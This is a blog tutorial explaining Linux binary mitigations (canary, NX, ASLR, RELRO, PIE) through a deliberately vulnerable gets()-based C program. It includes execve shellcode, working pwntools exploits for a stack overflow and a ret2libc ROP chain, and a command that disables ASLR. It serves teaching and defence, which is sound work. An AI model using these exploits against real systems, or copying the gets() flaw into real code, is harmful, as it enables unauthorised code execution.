Understanding binary protections (and how to bypass) with a dumb example

Hi! Long time no see, huh? I must apologize for my lousy post schedule. In spite of covid-19 outbreak forcing us to stay home, it appears that I’ve never had less time to spare in my life. Well, let’s get to it.

Memory corruption issues often lead to pretty serious vulnerabilities. It is not uncommon for a stack or heap overflow, use-after-free, double free and others to lead to code execution. A few mitigations try to prevent this class of bugs from causing too much trouble, or at least to make the exploitation harder. Nevertheless, memory corruption is still a thing. Today we’ll talk about these mitigations, how they work, how effective they are and how they are commonly bypassed.

In the beginning…

Back in the day memory corruption was a sure path towards code execution. There were no protections at all and a simple stack overflow was enough to make a flow hijack.

Nowadays when you use GCC to compile a simple C program, the binary will be generated protected as hell. Let’s check it out:

test.c

#include <stdio.h>
#define SIZE 16

void get_buffer(char *strout)
{
    printf("Please input a string (max length %d)\n", SIZE);
    gets(strout); //oh, shush
}

int main (int argc, char **argv)
{
    char buf[SIZE];
    get_buffer(buf);
    printf("The buffer is:\n%s",buf);
    return 0;
}

└────╼ gcc test.c -o test
└────╼ checksec --file=test

RELRO           STACK CANARY      NX            PIE            
Full RELRO      Canary found      NX enabled    PIE enabled   

It has full RELRO, stack canary, NX and PIE. Not to mention that Linux will, by default, provide ASLR in runtime. (A little lost in these terms? No worries, we’ll get over them in no time)

So let’s rewind to the early days and deactivate all these memory protections. We’ll enable them later and see how they affect exploitation.

└────╼ gcc test.c -o test -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro
└────╼ checksec --file=test
RELRO           STACK CANARY      NX            PIE             
No RELRO        No canary found   NX disabled   No PIE

We compile our test file with no protections at all. I’ll also deactivate ASLR protection on my box:

└────╼ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Now we clearly have a stack overflow (or a stack out-of-bounds memory write, if you prefer). This program can be easily transformed into a terminal for code execution. If you have no idea how you can do this, this is a good place start. In that blog post we cracked an OSCP-like stack overflow on Windows. Here we use Linux. The tools are different, but the principles are the same.

Keep in mind that this is a mock test program, which will be used for our examples today. It runs locally, but you can (use your imagination and) picture it as if it was a server input, for example.

We now need to craft a shellcode (a code which will give us shell!) to trigger code execution.

Crafting our payload

First we need a shellcode. There’s no need to reinvent the wheel. Here we see a x64 shellcode we can use (thank you, shell-storm!).

The code of the shellcode may be seen below. Although assembly can be tough to understand at some times, I have added a few comments which might make it easier to grasp:

    xor eax, eax ; Zeroes out eax
    mov rbx, 0xFF978CD091969DD1 ; this puts "/bin/sh" with a zero by the end. But it is actually negated (so one may put '\0' and not cause the program to think it is the end of the string)
    neg rbx ; Negates RBX
    push rbx ; pushes RBX to stack
    push rsp ; This instruction pushed RSP to the stack
    pop rdi ; And this instruction pops it to RDI. The stack points to the string "/bin/sh". Now RDI points to "/bin/sh".
    cdq ; Zeroes out RDX
    push rdx ; Pushes zero to the stack.
    push rdi ; Pushes RDI to stack, which is the pointer to the /bin/sh string.
    push rsp ; Pushes RSP and
    pop rsi ; pops into RSI. -> rsi = rsp
    mov al, 0x3b ; execve syscall number.
    syscall ; SYSCALLS!

Basically what it does is call the execve syscall providing “/bin/sh” as argument.

And if we assemble this right (or just copy from shellstorm), we get the following bytes:

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

As this is not a stack overflow tutorial, I won’t dive into too much details regarding the creation of our payload. Instead, I’ll keep it breef. If you feel lost, I strongly recommend you look into the OSCP-like stack overflow exploitation tutorial.

I’ll run the program and attach GDB to it. I’ll also put a breakpoint in the main ret (or, rather, retq) instruction.

(gdb) disass main
Dump of assembler code for function main:
   0x000000000040052d <+0>:	push   %rbp
   0x000000000040052e <+1>:	mov    %rsp,%rbp
   0x0000000000400531 <+4>:	sub    $0x20,%rsp
   0x0000000000400535 <+8>:	mov    %edi,-0x14(%rbp)
   0x0000000000400538 <+11>:	mov    %rsi,-0x20(%rbp)
   0x000000000040053c <+15>:	lea    -0x10(%rbp),%rax
   0x0000000000400540 <+19>:	mov    %rax,%rdi
   0x0000000000400543 <+22>:	callq  0x4004f7 <get_buffer>
   0x0000000000400548 <+27>:	lea    -0x10(%rbp),%rax
   0x000000000040054c <+31>:	mov    %rax,%rsi
   0x000000000040054f <+34>:	lea    0xc9(%rip),%rdi        # 0x40061f
   0x0000000000400556 <+41>:	mov    $0x0,%eax
   0x000000000040055b <+46>:	callq  0x4003f0 <printf@plt>
   0x0000000000400560 <+51>:	mov    $0x0,%eax
   0x0000000000400565 <+56>:	leaveq 
   0x0000000000400566 <+57>:	retq   
(gdb) b *0x0000000000400566
Breakpoint 3 at 0x400566

Now I’ll send a bunch of “A"s to see if we can trigger anything.

Please input a string (max length 16)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

And our breakpoint hits. Let’s see what’s in the stack.

Thread 1 "test" hit Breakpoint 3, 0x0000000000400566 in main ()
(gdb) x/10x $rsp
0x7fffffffdda8:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddb8:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddc8:	0x41414141	0x41414141


So our payload is in the stack right before retq is called. retq is just a nickname for pop rip, which pops the stack to the instruction pointer and redirect the flow to the program. Since we control part of the stack, we can put our shellcode somewhere in there. But how would we trigger it?

Since the stack address will remain the same everytime we run the program, we can put the address for our payload right in 0x7fffffffdda8. And our shellcode right after (0x7fffffffddb0). By doing some inspection (printing values in the stack), we find out that the region we control starts at 0x7fffffffdd90.

How do I know this? Well, I used pattern. But another way is by mere inspection:

(gdb) x/10x $rsp-30
0x7fffffffdd8a:	0x00010040	0x41410000	0x41414141	0x41414141
0x7fffffffdd9a:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddaa:	0x41414141	0x41414141
(gdb) x/10x $rsp-24
0x7fffffffdd90:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdda0:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddb0:	0x41414141	0x41414141
(gdb) x/10x $rsp-25
0x7fffffffdd8f:	0x41414100	0x41414141	0x41414141	0x41414141
0x7fffffffdd9f:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddaf:	0x41414141	0x41414141

By inspection, we see that the stack pointer at the moment retq is called points to the position 24 of our buffer.

So we need a 24 byte long padding. This is what our payload will look like:

[24 bytes padding] + [address to our shellcode (0x7fffffffddb0)] + [shellcode]

Using python to build our payload and print it, or send it to a file, or call the program directly, we’d have this:

payload = "A"*24 + "\xb0\xdd\xff\xff\xff\x7f\x00\x00\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

I’ll write a python “exploit” for this using pwntools:

from pwn import *
context(arch='amd64', os='linux')
payload = "A"*24 + "\xb0\xdd\xff\xff\xff\x7f\x00\x00\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

io = process("/home/danilo/tmp/test")
io.readline()
io.sendline(payload)
io.interactive()

What this code does is open the target program, read the “Please input a string (max length 16)” line, send our payload and open an interactive channel with the program. The result is a shell:

└────╼ python3 exploit.py 
[+] Starting local process '/home/danilo/tmp/test': pid 20836
[*] Switching to interactive mode
The buffer is:
$ ls
exploit.py  test  test.c
$ pwd
/home/danilo/tmp
$ 

Great! So upon finding a buffer overflow, it is relatively easy to exploit it into code execution. Or at least it was a couple of decades ago. Now let’s enable the protections and see how it goes.

In the next few sections I’ll present each memory corruption mitigation. They are not in any specific order.

Stack Canary

Canary

How cute are canaries?

Well, very cute. According to wikipedia, coal miners used canaries to detect if there was any toxic gases, such as carbon monoxide, in the workplace. Or a snitch: an informant who sings to the police. And they totally mitigate stack overflow vulnerabilities.

The issue with the program we wrote on the previous section was a stack overflow. That means we had a buffer in our stack on which we could write an arbitrary amount of data, even if it surpasses the designated size of the buffer. An adversary may overwrite other data in the memory, such as the return address, and make a flow hijack, leading to arbitrary code execution.

The stack canary is made to detect if the return address was overwritten and make it more difficult to make a flow hijack.

It works very simply, but also very elegantly. An 8 byte long semi-random integer is put before the return address in the stack (see the representation below). Before the function returns, it checks if the canary has been altered. If it hasn’t, the flow continues gracefully. If it has, the program will crash. I said semi-random because not all bytes are random. There are 7 random bytes and a null byte ('\0’). If an adversary has an out of bounds write, he or she will have to overwrite the canary to get to the return address. The null byte was chosen because it is the string terminator. An adversary should have trouble inputting a string with a null byte. In case of a memory leak, the null byte will act as the string terminator before the canary can be printed.

+-----------------------+
|                       |
|         ...           |
|                       |
+-----------------------+
|                       |
|                       |
|                       |
|   Vulnerable buffer   |
|                       |
|                       |
|                       |
+-----------------------+
|                       |
|      Stack canary     |
+-----------------------+
|                       |
|     Return address    |
+-----------------------+
|                       |
|          ...          |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Let’s recompile our binary, now removing the -fno-stack-protector option:

gcc test.c -o test -z execstack -no-pie -Wl,-z,norelro

Now disassemble with gdb:

└────╼ gdb ./test
(gdb) disass main
Dump of assembler code for function main:
   0x000000000040059d <+0>:	push   %rbp
   0x000000000040059e <+1>:	mov    %rsp,%rbp
   0x00000000004005a1 <+4>:	sub    $0x30,%rsp
   0x00000000004005a5 <+8>:	mov    %edi,-0x24(%rbp)
   0x00000000004005a8 <+11>:	mov    %rsi,-0x30(%rbp)
   0x00000000004005ac <+15>:	mov    %fs:0x28,%rax
   0x00000000004005b5 <+24>:	mov    %rax,-0x8(%rbp)
   0x00000000004005b9 <+28>:	xor    %eax,%eax
   0x00000000004005bb <+30>:	lea    -0x20(%rbp),%rax
   0x00000000004005bf <+34>:	mov    %rax,%rdi
   0x00000000004005c2 <+37>:	callq  0x400567 <get_buffer>
   0x00000000004005c7 <+42>:	lea    -0x20(%rbp),%rax
   0x00000000004005cb <+46>:	mov    %rax,%rsi
   0x00000000004005ce <+49>:	lea    0xda(%rip),%rdi        # 0x4006af
   0x00000000004005d5 <+56>:	mov    $0x0,%eax
   0x00000000004005da <+61>:	callq  0x400460 <printf@plt>
   0x00000000004005df <+66>:	mov    $0x0,%eax
   0x00000000004005e4 <+71>:	mov    -0x8(%rbp),%rdx
   0x00000000004005e8 <+75>:	xor    %fs:0x28,%rdx
   0x00000000004005f1 <+84>:	je     0x4005f8 <main+91>
   0x00000000004005f3 <+86>:	callq  0x400450 <__stack_chk_fail@plt>
   0x00000000004005f8 <+91>:	leaveq 
   0x00000000004005f9 <+92>:	retq   
End of assembler dump.

Here we see the assembly code of the main function. Note these lines specifically:

...
   0x00000000004005ac <+15>:	mov    %fs:0x28,%rax
   0x00000000004005b5 <+24>:	mov    %rax,-0x8(%rbp)

...

   0x00000000004005e4 <+71>:	mov    -0x8(%rbp),%rdx
   0x00000000004005e8 <+75>:	xor    %fs:0x28,%rdx
   0x00000000004005f1 <+84>:	je     0x4005f8 <main+91>
   0x00000000004005f3 <+86>:	callq  0x400450 <__stack_chk_fail@plt>
   0x00000000004005f8 <+91>:	leaveq 
   0x00000000004005f9 <+92>:	retq   

In <+15> and <+24> it puts the canary in the position %rbp-0x8. Note that the canary will remain the same throughout all functions within the program.

Later on, on lines <+71>, <+75>, it loads the stored canary to %rdx and compares with the original value. If it is equal, (<+84>) meaning the canary hasn’t been altered, it will jump to <+91> leaving the function gracefully. If it is not equal, the __stack_chk_fail function will be called, causing the program to crash:

└────╼ ./test 
Please input a string (max length 16)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The buffer is:
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)

This mitigation kills the vulnerability here. However, note that canary is not a silver bullet (or a silver shield??). It only prevents adversaries from writing beyond the canary. Anything before the canary can be overwritten. It is also only effective on stack out of bounds write. There are many other memory corruption bug classes, such as use-after-free, arbitrary read, arbitrary write, double free, and others. Moreover, there is the possibility of a canary leak, but that would depend on a second vulnerability.

Summarizing, canaries offer a good protection against stack overflow vulnerabilities. A canary leak is a way to bypass this mitigation, but would depend on another vulnerability. The null-byte also mitigates for most part. However, it does not protect from other memory corruption vulnerabilities.

NX

The NX (no-execute) bit is used to mark regions of memory as unexecutable. There’s no reason for the stack or heap to be executed, for instance, since all the code is in the .TEXT region. With this protection enabled, adversaries need to get more creative to try and bypass the mitigation.

This mitigation also makes our payload useless, since it gets executed in the stack. If we put our payload, we get exit code -11 (SIGSEGV). But is there any bypass?

Ret2libc

Well, yes. It means we can’t add new code to the program, but we can conveniently reuse code that is already in the program.

The return-to-libc technique is based on overwriting return addresses to point to gadgets in libc. Libc is enormous. There are gadgets to do pretty much anything there. For instance, there is the function execve previously used, which will set stuff up for calling the execve syscall.

But exploiting gets a bit trickier.

First, we deactivate the canary again and activate the NX protection:

gcc test.c -o test -fno-stack-protector -no-pie -Wl,-z,norelro

To craft our new payload, we’ll be using GDB with peda plugin and pwntools with python3.

The goal here is to reuse existing code to get where we want. We need to call the execve syscall. I have started the program and attached gdb to it. I’ll use disass execve to get the address of the execve libc wrapper:

gdb-peda$ disass execve
Dump of assembler code for function execve:
   0x00007ffff7ac6c00 <+0>:	mov    eax,0x3b
   0x00007ffff7ac6c05 <+5>:	syscall 
   0x00007ffff7ac6c07 <+7>:	cmp    rax,0xfffffffffffff001
   0x00007ffff7ac6c0d <+13>:	jae    0x7ffff7ac6c10 <execve+16>
   0x00007ffff7ac6c0f <+15>:	ret    
   0x00007ffff7ac6c10 <+16>:	mov    rcx,QWORD PTR [rip+0x306251]        # 0x7ffff7dcce68
   0x00007ffff7ac6c17 <+23>:	neg    eax
   0x00007ffff7ac6c19 <+25>:	mov    DWORD PTR fs:[rcx],eax
   0x00007ffff7ac6c1c <+28>:	or     rax,0xffffffffffffffff
   0x00007ffff7ac6c20 <+32>:	ret    
End of assembler dump.

Here we see that the address of execve function is 0x00007ffff7ac6c00. We need to pass “/bin/bash” as argument to that syscall, so it opens the terminal (which is our goal here). To do that, we need to set the rdi register to point to “/bin/bash” string. In addition, rsi register should be zero. You may be wondering how do I know that. Well, I have checked Linux System Call table.

To correctly set the values for these two registers we need gadgets. Gadgets are parts of existing binary code which we can use to get the desired effect.

We need to set rdi register to “/bin/bash”. We can put the string in the stack and use a pop rdi;ret gadget to load the address to rdi.

Fortunately, libc is gigantic and have enough gadgets so we can do anything we want. And peda will make it very easy to find these gadgets. First let’s see how our payload will be:

padding + pop rdi; ret; + rdi value (pointer to "/bin/bash" string) + pop rsi; ret + rsi value (zero!) + execve addr + "/bin/sh"

It starts with the 24 byte long padding. Then, we’ll set the value of rdi to point to “/bin/sh” string. Then we’ll zero rsi out. After that, execve addr will be put and, finally, the “/bin/sh” string.

To find our gadgets, we’ll use peda:

gdb-peda$ ropsearch "pop rdi; ret" libc
Searching for ROP gadget: 'pop rdi; ret' in: libc ranges
0x00007ffff7a035bf : (b'5fc3')	pop rdi; ret
0x00007ffff7a044ae : (b'5fc3')	pop rdi; ret
0x00007ffff7a04c37 : (b'5fc3')	pop rdi; ret
0x00007ffff7a04cbe : (b'5fc3')	pop rdi; ret
0x00007ffff7a05bd2 : (b'5fc3')	pop rdi; ret
0x00007ffff7a05f4b : (b'5fc3')	pop rdi; ret
0x00007ffff7a072e7 : (b'5fc3')	pop rdi; ret
0x00007ffff7a077ce : (b'5fc3')	pop rdi; ret
0x00007ffff7a07ce6 : (b'5fc3')	pop rdi; ret
0x00007ffff7a08260 : (b'5fc3')	pop rdi; ret
0x00007ffff7a088b9 : (b'5fc3')	pop rdi; ret
0x00007ffff7a08b81 : (b'5fc3')	pop rdi; ret
0x00007ffff7a09647 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0a677 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0b79c : (b'5fc3')	pop rdi; ret
0x00007ffff7a0be84 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0ca1f : (b'5fc3')	pop rdi; ret
0x00007ffff7a0d0cc : (b'5fc3')	pop rdi; ret
0x00007ffff7a0dbcc : (b'5fc3')	pop rdi; ret
0x00007ffff7a0e198 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0e261 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0ef59 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0f204 : (b'5fc3')	pop rdi; ret
0x00007ffff7a102d3 : (b'5fc3')	pop rdi; ret
0x00007ffff7a10307 : (b'5fc3')	pop rdi; ret
--More--(25/489)

It has found 489 occurrences of “pop rdi; ret” in libc which we can use. Any one will do. I’ll use 0x00007ffff7a035bf to craft my payload.

Now the other gadget:

gdb-peda$ ropsearch "pop rsi; ret" libc
Searching for ROP gadget: 'pop rsi; ret' in: libc ranges
0x00007ffff7a05eea : (b'5ec3')	pop rsi; ret
0x00007ffff7a12097 : (b'5ec3')	pop rsi; ret
0x00007ffff7a229da : (b'5ec3')	pop rsi; ret
0x00007ffff7a40854 : (b'5ec3')	pop rsi; ret
0x00007ffff7a461b3 : (b'5ec3')	pop rsi; ret
0x00007ffff7a4d1c5 : (b'5ec3')	pop rsi; ret
0x00007ffff7a5e8a4 : (b'5ec3')	pop rsi; ret
0x00007ffff7a60e93 : (b'5ec3')	pop rsi; ret
0x00007ffff7a60ecb : (b'5ec3')	pop rsi; ret
0x00007ffff7a62ede : (b'5ec3')	pop rsi; ret
0x00007ffff7a640d4 : (b'5ec3')	pop rsi; ret
0x00007ffff7a641b8 : (b'5ec3')	pop rsi; ret
0x00007ffff7a64fc9 : (b'5ec3')	pop rsi; ret
0x00007ffff7a66fa6 : (b'5ec3')	pop rsi; ret
0x00007ffff7a66ff1 : (b'5ec3')	pop rsi; ret
0x00007ffff7a69c62 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6a6e0 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6aa17 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6aac0 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6aaf6 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6b32f : (b'5ec3')	pop rsi; ret
0x00007ffff7a6bd09 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6c138 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6e5ee : (b'5ec3')	pop rsi; ret
0x00007ffff7a6f246 : (b'5ec3')	pop rsi; ret
--More--(25/149)

149 occurrences. Again, any one will do. I’ll use 0x00007ffff7a05eea.

Ok, so we refine our stack payload:

24 byte long padding + 0x00007ffff7a035bf + STACK ADDRESS FOR "/bin/sh" STRING + 0x00007ffff7a05eea + 0 + 0x00007ffff7ac6c00 + "/bin/sh"

All that’s left to do is find out the stack addr for “/bin/sh”. Gdb can do that for us. I’ll prepare the payload without the stack address (will put some garbage instead), send the payload, and see where the string hits. Check the “exploit” out:

from pwn import *
context(arch='amd64', os='linux')
addr_execve = 0x00007ffff7ac6c00 # execve
addr_poprdi_ret = 0x00007ffff7a035bf # pop rdi; ret
addr_poprsi_ret = 0x00007ffff7a05eea # pop rsi; ret
addr_binsh_str = 0xdeadbeefdeadbeef

payload = b"A"*24 + pack(addr_poprdi_ret) + pack(addr_binsh_str) + pack(addr_poprsi_ret) + pack(0) +  pack(addr_execve) + b"/bin/bash" 

io = process("/home/danilo/tmp/test")

raw_input() # This will stop the program in time so we can attach gdb. 

io.readline()
io.sendline(payload)
io.interactive()

We can run it and attach gdb. A breakpoint will be put in the main return instruction.

gdb-peda$ disass main
Dump of assembler code for function main:
   0x000000000040052d <+0>:	push   rbp
   0x000000000040052e <+1>:	mov    rbp,rsp
   0x0000000000400531 <+4>:	sub    rsp,0x20
   0x0000000000400535 <+8>:	mov    DWORD PTR [rbp-0x14],edi
   0x0000000000400538 <+11>:	mov    QWORD PTR [rbp-0x20],rsi
   0x000000000040053c <+15>:	lea    rax,[rbp-0x10]
   0x0000000000400540 <+19>:	mov    rdi,rax
   0x0000000000400543 <+22>:	call   0x4004f7 <get_buffer>
   0x0000000000400548 <+27>:	lea    rax,[rbp-0x10]
   0x000000000040054c <+31>:	mov    rsi,rax
   0x000000000040054f <+34>:	lea    rdi,[rip+0xc9]        # 0x40061f
   0x0000000000400556 <+41>:	mov    eax,0x0
   0x000000000040055b <+46>:	call   0x4003f0 <printf@plt>
   0x0000000000400560 <+51>:	mov    eax,0x0
   0x0000000000400565 <+56>:	leave  
   0x0000000000400566 <+57>:	ret    
End of assembler dump.
gdb-peda$ br *0x0000000000400566
Breakpoint 1 at 0x400566
gdb-peda$ c
Thread 1 "test" hit Breakpoint 1, 0x0000000000400566 in main ()
gdb-peda$ x/10x $rsp
0x7fffffffdda8:	0x00007ffff7a035bf	0xdeadbeefdeadbeef
0x7fffffffddb8:	0x00007ffff7a05eea	0x0000000000000000
0x7fffffffddc8:	0x00007ffff7ac6c00	0x7361622f6e69622f
0x7fffffffddd8:	0xd1b02fd71f9c0068	0x0000000000400410
0x7fffffffdde8:	0x00007fffffffde80	0x0000000000000000

Looks like we found our target. And it is in address 0x7fffffffddd0:

gdb-peda$ x/s 0x7fffffffddd0
0x7fffffffddd0:	"/bin/bash"

So our final exploit is:

from pwn import *
context(arch='amd64', os='linux')
addr_execve = 0x00007ffff7ac6c00 # execve
addr_poprdi_ret = 0x00007ffff7a035bf # pop rdi; ret
addr_poprsi_ret = 0x00007ffff7a05eea # pop rsi; ret
addr_binsh_str = 0x7fffffffddd0

payload = b"A"*24 + pack(addr_poprdi_ret) + pack(addr_binsh_str) + pack(addr_poprsi_ret) + pack(0) +  pack(addr_execve) + b"/bin/bash" 

io = process("/home/danilo/tmp/test")
raw_input()
io.readline()
io.sendline(payload)
io.interactive()

And the result:

└────╼ python3 exploit.py 
[+] Starting local process '/home/danilo/tmp/test': pid 15432

[*] Switching to interactive mode
The buffer is:
$ whoami
danilo
$ 

Very nice! We managed to make a flow hijack to get a terminal using libc gadgets.

ASLR

Address Space Layout Randomization, or ASLR for short, would kill the technique used in the previous section. As the name implies, it randomizes the address space layout. This means that each time you run the program, the stack and heap will be in a different addresses. And libc (and all other libs used) will also be in different random addresses.

This kills our previous approach, since we relied on libc gadgets (and now we don’t know where they are) and on knowing the stack address (which will be different on every execution).

Or does it?

Bypassing ASLR?

There are two main ways to bypass ASLR. The first is leaking a libc address. If one single libc function address is leaked, we can calculate the offset and find out where all the gadgets are! However, that would depend on a second vulnerability to leak the address. This is not extremely improbable, but will not happen in our silly example.

The other relies on reusing only the program code. The .TEXT section will not be randomized in ASLR, so we have our entire program to find gadgets. Our silly example is not that long, meaning we won’t find many useful gadgets there.

It’s a shame that we will not demonstrate ASLR bypass in this post. However, I’ll make room for one in the future. (Actually, I have been writting one for a while now and should be out soon.)

RELRO

Before talking about RELRO, first a word or two must be spoken on Procedure Linkage Table (PLT) and Global Offset Table (GOT). In our program we call the libc functions “printf” and “gets”. If ASLR is disabled, these libc functions will always have the same address, as may be seen with the use of ldd program:

└────╼ ldd test
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
└────╼ ldd test
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
└────╼ ldd test
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)

Note that libc addresses remain the same on every execution. However, look what happens when ASLR is enabled:

└────╼ ldd test
	linux-vdso.so.1 (0x00007ffe4ed82000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5016311000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f5016702000)
└────╼ ldd test
	linux-vdso.so.1 (0x00007ffe621a3000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc0abf36000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fc0ac327000)
└────╼ ldd test
	linux-vdso.so.1 (0x00007ffe377ac000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1ec5854000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f1ec5c45000)

The addresses are different everytime! Libc is loaded dinamically in runtime. This makes the program smaller and makes updates on libc easier, as the program does not have to be recompiled upon every libc update. But when printf or gets is called upon, how does it know the address to call?

Well, PLT and GOT are the two answers. When the program calls a function - such as printf - it will not call libc’s function directly. Instead, it will call a wrapper in the PLT:

gdb-peda$ disass main
Dump of assembler code for function main:
...
   0x000000000040055b <+46>:	call   0x4003f0 <printf@plt>
...

Let’s see what’s up in 0x4003f0 address:

gdb-peda$ disass 0x4003f0
Dump of assembler code for function printf@plt:
   0x00000000004003f0 <+0>:	jmp    QWORD PTR [rip+0x2005aa]        # 0x6009a0
   0x00000000004003f6 <+6>:	push   0x0
   0x00000000004003fb <+11>:	jmp    0x4003e0
End of assembler dump.

If we disassamble 0x6009a0, we get something in the GOT:

gdb-peda$ disass 0x6009a0
Dump of assembler code for function _GLOBAL_OFFSET_TABLE_:
   0x0000000000600988:	test   al,0x7
   0x000000000060098a:	(bad)  
   0x000000000060098b:	add    BYTE PTR [rax],al
   0x000000000060098d:	add    BYTE PTR [rax],al
   0x000000000060098f:	add    BYTE PTR [rax+0x31],dh
   0x0000000000600992:	xor    al,0x24
   0x0000000000600994:	in     al,0x7f
   0x0000000000600996:	add    BYTE PTR [rax],al
   0x0000000000600998:	rex clc 
   0x000000000060099a:	adc    ah,BYTE PTR [rsp+riz*8]
   0x000000000060099d:	jg     0x60099f
   0x000000000060099f:	add    BYTE PTR [rax-0x41],dh
   0x00000000006009a2:	fsub   DWORD PTR [rbx]
   0x00000000006009a4:	in     al,0x7f
   0x00000000006009a6:	add    BYTE PTR [rax],al
   0x00000000006009a8:	nop
   0x00000000006009a9:	jno    0x600985
   0x00000000006009ab:	and    esp,esp
   0x00000000006009ad:	jg     0x6009af
   0x00000000006009af:	add    BYTE PTR [rax],al
End of assembler dump.

So what the hell is that?

Since the compiler does not know where to find printf, it makes a wrapper in a memory region just before .TEXT called PLT. This guy is a wrapper to the GOT, another memory region. That’s where things get interesting.

On the first time printf is called on the GOT, it still does not know how to find the libc function. But it will try and find it. When it finds it in libc (a process called dynamic linking), it will redirect to that function’s address. It will also rewrite itself so that in the next time printf is called it already knows where to find it.

A possible attack is to rewrite the PLT or the GOT so it overwrites the pointer to printf function, making it point to somewhere malicious. This can be achieved through an overflow or arbitrary write, for instance.

RELRO, or Relocation Read-Only, is fully enabled, it will prevent from writing in the PLT or GOT, making the forementioned attack impossible. However, it has an overhead to entirely populate the GOT before the main function gets executed.

There’s no bypass to this mitigation that I know of. Except, of course, for using a different approach.

PIE

Position Independent Executables (PIE) provides an extra layer of protection which makes return oriented programming very difficult. We have seen that ASLR will randomize a few parts of the program, but an adversary may still use the .TEXT region for gadgets. PIE randomizes the offset of almost every memory region in the binary. However, this causes a great performance overhead.

To bypass this mitigation, one must have a leaked address to calculate the offset and compensate.

Conclusion

Let’s do a TL;DR here:

Stack canary

A semi-random 8 bytes long integer before the return address so it can’t be overwritten by exploiting a stack buffer overflow.

Pros: very effective against stack buffer overflow. The performance overhead is minimal.

Cons: Does not protect against other memory corruption vulnerabilities.

Bypass: Leak the canary.

NX

Prevents a few regions of the memory (such as the stack and heap) to be executed. With this mitigation, an adversary is unable to put new code into the program and has to do a code-reusage attack.

Pros: makes it impossible to add new code to the program. Prevent dangerous and unnecessary regions to be executed. The performance overhead is minimal.

Cons: does not offer much protection, as ret2libc is a fairly easy bypass.

Bypass: ret2lib, return oriented programming.

ASLR

Randomizes a few regions of the memory, such as stack, heap and libs.

Pros: effective to mitigate ret2libc attacks. It has a reasonable performance overhead, but not an issue.

Cons: does not prevent an adversary to use gadgets within the program.

Bypass: gadgets in the program and address leak.

RELRO

Constructs the GOT before the main function is called and makes it unwritable.

Pros: kills attacks which relies on changing PLT or GOT.

Cons: other attacks are still possible. There’s a performance overhead.

Bypass: none. Perhaps use another approach?

PIE

Randomizes the entire program virtual memory.

Pros: very effective against code-reuse attacks (such as return oriented programming).

Cons: considerable performance overhead.

Bypass: address leak.